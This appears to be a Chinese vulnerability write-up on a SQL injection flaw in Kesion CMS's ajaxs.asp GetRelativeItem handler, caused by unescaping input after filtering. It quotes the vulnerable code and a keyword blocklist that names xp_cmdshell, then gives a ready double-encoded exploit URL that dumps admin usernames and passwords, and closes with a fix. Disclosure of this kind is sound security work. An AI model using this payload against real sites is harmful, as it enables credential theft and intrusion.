Kesion cms注入漏洞分析及其修复方案
函数过滤混乱导致注入<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode30"><br />Dim KS:Set KS=New PublicCls<br /> Dim Action<br /> Action=KS.S("Action")<br /> Select Case Action<br />Case "Ctoe" CtoE<br />Case "GetTags" GetTags<br />Case "GetRelativeItem" GetRelativeItem //问题函数<br />...skip...<br />Case "getonlinelist" getonlinelist<br /> End Select<br /> Sub GetRelativeItem() //漏洞函数开始<br /> Dim Key:Key=UnEscape(KS.S("Key"))//漏洞位置,只调用ks.s函数,无其它过滤。<br /> Dim Rtitle:rtitle=lcase(KS.G("rtitle"))<br /> Dim RKey:Rkey=lcase(KS.G("Rkey"))<br /> Dim ChannelID:ChannelID=KS.ChkClng(KS.S("Channelid"))<br /> Dim ID:ID=KS.ChkClng(KS.G("ID"))<br /> Dim Param,RS,SQL,k,SqlStr<br /> If Key<>"" Then<br /> If (Rtitle="true" Or RKey="true") Then<br /> If Rtitle="true" Then<br /> param=Param & " title like '%" & key & "%'"//类似搜索型注入漏洞。<br /> end if<br /> If Rkey="true" Then<br /> If Param="" Then<br /> Param=Param & " keywords like '%" & key & "%'"<br /> Else<br /> Param=Param & " or keywords like '%" & key & "%'"<br /> End If<br /> End If<br /> Else<br /> Param=Param & " keywords like '%" & key & "%'"<br /> End If<br /> End If<br /> If Param<>"" Then<br /> Param=" where InfoID<>" & id & " and (" & param & ")"<br /> else<br /> Param=" where InfoID<>" & id<br /> end if<br /> If ChannelID<>0 Then Param=Param & " and ChannelID=" & ChannelID<br /> Param=Param & " and verific=1"<br /> SqlStr="Select top 30 ChannelID,InfoID,Title From KS_ItemInfo " & Param & " order by id desc" //查询 <br /> Set RS=Server.CreateObject("ADODB.RECORDSET")<br /> RS.Open SqlStr,conn,1,1<br /> If Not RS.Eof Then<br /> SQL=RS.GetRows(-1)<br /> End If<br /> RS.Close<br /> </div><br /> 先进行了过滤,然后才调用UnEscape解码,<br /> <br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode31"><br /> Public Function S(Str)<br /> S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))<br /> Function DelSql(Str)<br /> Dim SplitSqlStr,SplitSqlArr,I<br /> SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"<br /> SplitSqlArr = Split(SplitSqlStr,"|")<br /> For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)<br /> If Instr(LCase(Str),SplitSqlArr(I))>0 Then<br /> Die "<script>alert('系统警告!\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP:"&GetIP&";\n4、操作日期:"&Now&";\n Powered By Kesion.Com!');window.close();</script>"<br /> End if<br /> Next<br /> DelSql = Str<br /> End Function<br /> </div><br /> 如果配合Unescape()函数,刚过滤不会生效。可以采用unicode编码方式,则不会在浏览器中出现被过滤的字符。例如,单引号可以编码为。%2527,经过解码后还是“'”号,这样的话,就可以利用类似php的二次编码漏洞的方式绕过过滤了。<br />注入语句:%') union select 1,2,username+'|'+ password from KS_Admin<br /> 转换如下:<br /> /plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500<br /> 修复方案:<br />UnEscape()函数调用位置放在函数体内,或者不调用。<br />
頁:
[1]